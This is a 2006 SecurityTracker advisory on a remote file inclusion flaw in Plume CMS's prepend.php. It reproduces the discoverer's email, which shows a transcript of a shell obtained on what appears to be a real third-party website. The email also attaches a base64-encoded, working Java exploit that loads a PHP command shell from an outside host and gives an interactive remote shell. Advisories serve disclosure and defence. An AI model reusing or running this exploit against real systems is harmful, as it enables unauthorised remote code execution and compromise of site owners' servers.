Plume CMS Include File Error in 'prepend.php' Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1015624 |
|
SecurityTracker URL: http://securitytracker.com/id/1015624
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 14 2006
|
Impact:
Execution of arbitrary code via network, User access via network
|
|
|
Description:
unitedbr of Untruth Labs reported a vulnerability in Plume CMS. A remote user can execute arbitrary commands on the target system.
The 'prepend.php' script does not properly validate user-supplied input in the 'manager_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.plume-cms.net/ (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 14 Feb 2006 07:59:56 -0300
Subject: Plume CMS bug and exploit
|
/*
____ ____ __
| | | | | | | /
| | | | | |___/ \
| | --- | |----| | \ \
|____| |____ | | |____| __/
Copyright (C) 2006 Untruth Labs
Plume CMS remote file inclusion
bug founded by unitedbr
remote: yes
vendor: www.plume-cms.net
exploitation: the user can inject remote bad php code
file prepend.php, line 38 and 39:
include_once $_PX_config['manager_path'].'/conf/config.php';
include_once $_PX_config['manager_path'].'/inc/lib.text.php';
Exploit working:
$ java plume1 www.airedebussac.org /
-===========================-
-= Untruth Labs presents =-
-= =-
-= PLUME CMS EXPLOIT =-
-= =-
-= by unitedbr =-
-===========================-
bash-2.05$ id
id
uid=55012(airedebu) gid=100(users) groups=99(nobody)
bash-2.05$ uname -a
uname -a
Linux web118.60gp.ha.ovh.net 2.4.31-mutu-hidden #1 SMP Tue Oct 11 11:51:39 CEST
2005 i686 unknown
bash-2.05$ pwd
pwd
/home.2/airedebu/www
bash-2.05$ exit
exit
$
*/
Content-Type: application/octet-stream; name="plume1.java"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="plume1.java"
LyoNCiAgICAgICAgICAgICAgICAgIF9fX18gICBfX19fICAgIF9fDQp8ICAgIHwgICAgIHwgICAg
IHwgICAgfCB8ICAgIHwgIC8NCnwgICAgfCAgICAgfCAgICAgfCAgICB8IHxfX18vICAgXA0KfCAg
ICB8IC0tLSB8ICAgICB8LS0tLXwgfCAgIFwgICAgXA0KfF9fX198ICAgICB8X19fXyB8ICAgIHwg
fF9fX198IF9fLw0KDQpDb3B5cmlnaHQgKEMpIDIwMDYgVW50cnV0aCBMYWJzDQoNClBsdW1lIENN
UyByZW1vdGUgZmlsZSBpbmNsdXNpb24NCmJ1ZyBmb3VuZGVkIGJ5IHVuaXRlZGJyDQoNCnJlbW90
ZTogeWVzDQp2ZW5kb3I6IHd3dy5wbHVtZS1jbXMubmV0DQpleHBsb2l0YXRpb246IHRoZSB1c2Vy
IGNhbiBpbmplY3QgcmVtb3RlIGJhZCBwaHAgY29kZQ0KDQpmaWxlIHByZXBlbmQucGhwLCBsaW5l
IDM4IGFuZCAzOToNCg0KaW5jbHVkZV9vbmNlICRfUFhfY29uZmlnWydtYW5hZ2VyX3BhdGgnXS4n
L2NvbmYvY29uZmlnLnBocCc7DQppbmNsdWRlX29uY2UgJF9QWF9jb25maWdbJ21hbmFnZXJfcGF0
aCddLicvaW5jL2xpYi50ZXh0LnBocCc7DQoNCg0KRXhwbG9pdCB3b3JraW5nOg0KDQokIGphdmEg
cGx1bWUxIHd3dy53aHluZXQub3JnIC9kb3NzaWVycy8NCg0KIC09PT09PT09PT09PT09PT09PT09
PT09PT09PT0tDQogLT0gIFVudHJ1dGggTGFicyBwcmVzZW50cyAgPS0NCiAtPSAgICAgICAgICAg
ICAgICAgICAgICAgICA9LQ0KIC09ICAgIFBMVU1FIENNUyBFWFBMT0lUICAgID0tDQogLT0gICAg
ICAgICAgICAgICAgICAgICAgICAgPS0NCiAtPSAgICAgICAgICBieSB1bml0ZWRiciAgICA9LQ0K
IC09PT09PT09PT09PT09PT09PT09PT09PT09PT0tDQoNCmJhc2gtMi4wNSQgaWQNCmlkDQp1aWQ9
NTUwMTIoYWlyZWRlYnUpIGdpZD0xMDAodXNlcnMpIGdyb3Vwcz05OShub2JvZHkpDQoNCmJhc2gt
Mi4wNSQgdW5hbWUgLWENCnVuYW1lIC1hDQpMaW51eCB3ZWIxMTguNjBncC5oYS5vdmgubmV0IDIu
NC4zMS1tdXR1LWhpZGRlbiAjMSBTTVAgVHVlIE9jdCAxMSAxMTo1MTozOSBDRVNUDQoyMDA1IGk2
ODYgdW5rbm93bg0KDQpiYXNoLTIuMDUkIHB3ZA0KcHdkDQovaG9tZS4yL2FpcmVkZWJ1L3d3dw0K
DQpiYXNoLTIuMDUkIGV4aXQNCmV4aXQNCg0KJA0KIA0KIA0KIE9CUzogdXNlIG9ubHkgcjN2M25n
NG5zIGNtZCB0byBleHBsb2l0IHdpdGggdGhpcyBleHBsb2l0LCBvdGhlcndpc2Ugd29uJ3Qgd29y
ayA6XA0KIA0KICovDQoNCmltcG9ydCBqYXZhLmlvLio7DQppbXBvcnQgamF2YS5uZXQuKjsNCg0K
DQpwdWJsaWMgY2xhc3MgcGx1bWUxIHsNCgkNCglwdWJsaWMgc3RhdGljIFN0cmluZyBmaWx0cmFy
Q29tYW5kb0V4ZWN1dGFkbyggU3RyaW5nIHJlc3Bvc3RhICkNCgl7DQoJCXJldHVybiByZXNwb3N0
YS5zdWJzdHJpbmcocmVzcG9zdGEuaW5kZXhPZigiYmFja2dyb3VuZC1jb2xvcjpibGFjazt3aWR0
aDo2ODM7XCI+IikgKyAzNSwgcmVzcG9zdGEuaW5kZXhPZigiPC9URVhUQVJFQT4iKSApOw0KCX0N
CiAgICANCiAgICBwdWJsaWMgc3RhdGljIFN0cmluZyB0aXJhQmFycmEoIFN0cmluZyBzaXRlICkN
CiAgICB7DQogICAgCQlyZXR1cm4gc2l0ZS5zdWJzdHJpbmcoMCwgc2l0ZS5pbmRleE9mKCIvIikg
KTsNCiAgICB9DQogICAgDQogICAgcHVibGljIHN0YXRpYyBTdHJpbmcgdGlyYUh0dHAoIFN0cmlu
ZyBzaXRlICkNCiAgICB7DQogICAgCXJldHVybiBzaXRlLnN1YnN0cmluZyg3LCBzaXRlLmxlbmd0
aCgpKTsNCiAgICB9DQoJDQoJcHVibGljIHN0YXRpYyBTdHJpbmcgZ2V0UmVzcG9uc2UoIFN0cmlu
ZyBzaXRlLCBTdHJpbmcgZGlyLCBTdHJpbmcgY21kICkNCgl7DQoJCQ0KCQlTdHJpbmcgcGhwX3N0
cmluZyA9ICIvcHJlcGVuZC5waHA/X1BYX2NvbmZpZ1ttYW5hZ2VyX3BhdGhdPSI7DQoJCVN0cmlu
ZyB0b29sID0gImh0dHA6Ly93d3cuamttYXJ0LmluZm8vYTF0cy90b29sLmdpZj8mY21kPSI7DQoJ
CVN0cmluZyByZWNlYmlkbyA9ICIiOw0KCQlpbnQgaSA9IDA7DQoJCQ0KCQlpZiAoIChzaXRlLmxl
bmd0aCgpID4gNykgJiYgKHNpdGUuaW5kZXhPZigiaHR0cDovLyIpID4gLTEpICkNCgkJCXNpdGUg
PSB0aXJhSHR0cChzaXRlKTsNCgkJCQ0KCQlpZiggc2l0ZS5pbmRleE9mKCIvIikgPiAtMSApDQoJ
CQlzaXRlID0gdGlyYUJhcnJhKHNpdGUpOw0KCQkNCgkJaW50IHBvczEgPSBkaXIuaW5kZXhPZigi
LyIpOw0KCQlpbnQgcG9zMiA9IGRpci5sYXN0SW5kZXhPZigiLyIpOw0KCQkNCgkJU3RyaW5nIHRl
bXAgPSAiIjsNCgkJDQoJCWlmKCBwb3MxID09IHBvczIgKQ0KCQl7DQoJCQl0ZW1wID0gZGlyOw0K
CQkJZGlyID0gIi8iICsgdGVtcDsNCgkJfSANCgkJDQoJCXRyeSB7DQogICAgICAgIC8vIENvbnN0
cnVjdCBkYXRhDQogICAgICAgIFN0cmluZyBDTUQgPSBVUkxFbmNvZGVyLmVuY29kZShjbWQsICJV
VEYtOCIpOw0KICAgIA0KICAgICAgICAvLyBDcmVhdGUgYSBzb2NrZXQgdG8gdGhlIGhvc3QNCiAg
ICAgICAgU3RyaW5nIGhvc3RuYW1lID0gc2l0ZTsNCiAgICAgICAgaW50IHBvcnQgPSA4MDsNCiAg
ICAgICAgSW5ldEFkZHJlc3MgYWRkciA9IEluZXRBZGRyZXNzLmdldEJ5TmFtZShob3N0bmFtZSk7
DQogICAgICAgIFNvY2tldCBzb2NrZXQgPSBuZXcgU29ja2V0KGFkZHIsIHBvcnQpOw0KICAgIA0K
ICAgICAgICBCdWZmZXJlZFdyaXRlciB3ciA9IG5ldyBCdWZmZXJlZFdyaXRlcihuZXcgT3V0cHV0
U3RyZWFtV3JpdGVyKHNvY2tldC5nZXRPdXRwdXRTdHJlYW0oKSwgIlVURjgiKSk7DQogICAgICAg
IA0KICAgICAgICAvLyBzdHJpbmc6IHd3dy52aXRpbWEuY29tL3ByZXBlbmQucGhwP19QWF9jb25m
aWdbbWFuYWdlcl9wYXRoXT1odHRwOi8vd3d3LmprbWFydC5pbmZvL2ExdHMvdG9vbC5naWY/JmNt
ZD1DTUQNCiAgICAgICAgd3Iud3JpdGUoIkdFVCAiICsgZGlyICsgcGhwX3N0cmluZyArIHRvb2wg
KyBDTUQgKyAiIEhUVFAvMS4wXHJcbiIpOw0KICAgICAgICB3ci53cml0ZSgiVXNlci1BZ2VudDog
TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMSlcclxuIik7
DQogICAgICAgIHdyLndyaXRlKCJIb3N0OiAiICsgaG9zdG5hbWUgKyAiXHJcbiIpOw0KICAgICAg
ICB3ci53cml0ZSgiQWNjZXB0OiAqLypcclxuIik7DQogICAgICAgIHdyLndyaXRlKCJDb25uZWN0
aW9uOiBDbG9zZVxyXG4iKTsNCiAgICAgICAgd3Iud3JpdGUoIlxyXG4iKTsNCiAgICAgICAgDQog
ICAgICAgIHdyLmZsdXNoKCk7DQogICAgDQogICAgICAgIC8vIEdldCByZXNwb25zZQ0KICAgICAg
ICBCdWZmZXJlZFJlYWRlciByZCA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1S
ZWFkZXIoc29ja2V0LmdldElucHV0U3RyZWFtKCkpKTsNCiAgICAgICAgU3RyaW5nIGxpbmU7DQog
ICAgICAgIHdoaWxlICgobGluZSA9IHJkLnJlYWRMaW5lKCkpICE9IG51bGwpIHsNCiAgICAgICAg
ICAgIHJlY2ViaWRvICs9IGxpbmU7DQogICAgICAgICAgICBpKys7DQogICAgICAgIH0NCiAgICAg
ICAgDQogICAgICAgIHdyLmNsb3NlKCk7DQogICAgICAgIHJkLmNsb3NlKCk7DQoJICAgIH0gY2F0
Y2ggKEV4Y2VwdGlvbiBlKSB7DQoJICAgIAlTeXN0ZW0ub3V0LnByaW50bG4oIlt+XSBFeGNlcHRp
b24gRXJyb3I6ICIgKyBlLmdldE1lc3NhZ2UoKSk7DQoJICAgIH0NCgkgICAgDQoJICAgIHJldHVy
biByZWNlYmlkbzsNCgl9DQoJDQoJcHVibGljIHN0YXRpYyB2b2lkIHVzYWdlKCkNCgl7DQoJCVN5
c3RlbS5vdXQucHJpbnRsbigiXG4gLT09PT09PT09PT09PT09PT09PT09PT09PT09PS0iICsNCgkJ
CQkJCQkJIlxuIC09ICBVbnRydXRoIExhYnMgcHJlc2VudHMgID0tIiArDQoJCQkJCQkJCSJcbiAt
PSAgICAgICAgICAgICAgICAgICAgICAgICA9LSIgKw0KCQkJCQkJCQkiXG4gLT0gICAgUExVTUUg
Q01TIEVYUExPSVQgICAgPS0iICsNCgkJCQkJCQkJIlxuIC09ICAgICAgICAgICAgICAgICAgICAg
ICAgID0tIiArDQoJCQkJCQkJCSJcbiAtPSAgICAgICAgICBieSB1bml0ZWRiciAgICA9LSIgKw0K
CQkJCQkJCQkiXG4gLT09PT09PT09PT09PT09PT09PT09PT09PT09PS0iICsNCgkJCQkJCQkJIlxu
XG4gVXNhZ2U6IiArDQoJCQkJCQkJCSJcbiAgIGphdmEgcGx1bWUxIHd3dy5zaXRlLmNvbSAvZGly
LyIgKw0KCQkJCQkJCQkiXG4gICBqYXZhIHBsdW1lMSB3d3cuc2l0ZS5jb20gLyIpOw0KCX0NCgkN
CglwdWJsaWMgc3RhdGljIHZvaWQgYmFzaCggU3RyaW5nIHNpdGUsIFN0cmluZyBkaXIgKSB0aHJv
d3MgSU9FeGNlcHRpb24NCgl7DQoJCVN0cmluZyBpbnB1dCA9ICIiLCByZXNwb3N0YSA9ICIiLCBj
b21hbmRvID0gIiI7DQoJCQ0KCQlTeXN0ZW0ub3V0LnByaW50bG4oIlxuIC09PT09PT09PT09PT09
PT09PT09PT09PT09PT0tIiArDQoJCQkJCQkJCSJcbiAtPSAgVW50cnV0aCBMYWJzIHByZXNlbnRz
ICA9LSIgKw0KCQkJCQkJCQkiXG4gLT0gICAgICAgICAgICAgICAgICAgICAgICAgPS0iICsNCgkJ
CQkJCQkJIlxuIC09ICAgIFBMVU1FIENNUyBFWFBMT0lUICAgID0tIiArDQoJCQkJCQkJCSJcbiAt
PSAgICAgICAgICAgICAgICAgICAgICAgICA9LSIgKw0KCQkJCQkJCQkiXG4gLT0gICAgICAgICAg
YnkgdW5pdGVkYnIgICAgPS0iICsNCgkJCQkJCQkJIlxuIC09PT09PT09PT09PT09PT09PT09PT09
PT09PT0tIik7DQoJCQ0KCQl3aGlsZSAoICFpbnB1dC5lcXVhbHMoImV4aXQiKSAmJiAhaW5wdXQu
ZXF1YWxzKCJleGl0MSIpICkJCQkJCQkNCgkJew0KCQkJdHJ5IHsgDQoJCQkJQnVmZmVyZWRSZWFk
ZXIgaW4gPSBuZXcgQnVmZmVyZWRSZWFkZXIoIG5ldyBJbnB1dFN0cmVhbVJlYWRlciggU3lzdGVt
LmluICkgKSA7DQoJCQkJU3lzdGVtLm91dC5wcmludCgiXG5iYXNoLTIuMDUkICIpOw0KCQkJCWlu
cHV0ID0gaW4ucmVhZExpbmUoKTsNCgkJCQlTeXN0ZW0ub3V0LnByaW50bG4oaW5wdXQpOw0KCQkJ
CQ0KCQkJCWlmKCAhaW5wdXQuZXF1YWxzKCJleGl0IikgKQ0KCQkJCXsNCgkJCQkJcmVzcG9zdGEg
PSBnZXRSZXNwb25zZSggc2l0ZSwgZGlyLCBpbnB1dCApOw0KCQkJCQ0KCQkJCQlpZiggIXJlc3Bv
c3RhLmVxdWFscygiIikgJiYgcmVzcG9zdGEuaW5kZXhPZigiYmFja2dyb3VuZC1jb2xvcjpibGFj
azt3aWR0aDo2ODM7XCI+IikgPiAtMSApDQoJCQkJCQljb21hbmRvID0gZmlsdHJhckNvbWFuZG9F
eGVjdXRhZG8oIHJlc3Bvc3RhICk7DQoJCQkJCWVsc2UNCgkJCQkJCWlucHV0ID0gImV4aXQxIjsN
CgkJCQkJCQ0KCQkJCQlTeXN0ZW0ub3V0LnByaW50bG4oY29tYW5kbyk7DQoJCQkJfQ0KCQkJfQ0K
CQkJY2F0Y2ggKEV4Y2VwdGlvbiBlKSANCgkJCXsNCgkJCQlTeXN0ZW0ub3V0LnByaW50bG4oIlxu
RXhjZXB0aW9uIEVSUk9SOiAiICsgZS5nZXRNZXNzYWdlKCkgKTsNCgkJCX0NCgkJCWlmKCBpbnB1
dC5lcXVhbHMoImV4aXQxIikgKQ0KCQkJew0KCQkJCVN5c3RlbS5vdXQucHJpbnRsbigiXG5ObyB3
YXkgdG8gZXhwbG9pdCB0aGlzIHNpdGUgOlxcIik7DQoJCQkJU3lzdGVtLm91dC5wcmludGxuKCJN
YXliZSBpcyBGb3JiaWRkZW4sIE5vdCBGb3VuZCBvciBpbiBzYWZlbW9kZS4uLiIpOw0KCQkJfQ0K
CQl9DQoJCQ0KCX0NCgkNCglwdWJsaWMgc3RhdGljIHZvaWQgbWFpbiAoIFN0cmluZyBhcmdzW10g
KSB0aHJvd3MgSU9FeGNlcHRpb24NCgl7DQoJCWlmKCBhcmdzLmxlbmd0aCAhPSAyKQ0KCQl7DQoJ
CQl1c2FnZSgpOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJU3RyaW5nIHNpdGUgPSBhcmdzWzBdOw0K
CQkJU3RyaW5nIGRpciA9IGFyZ3NbMV07DQoJCQkNCgkJCWJhc2goc2l0ZSwgZGlyKTsJDQoJCX0N
Cgl9DQp9
|
|
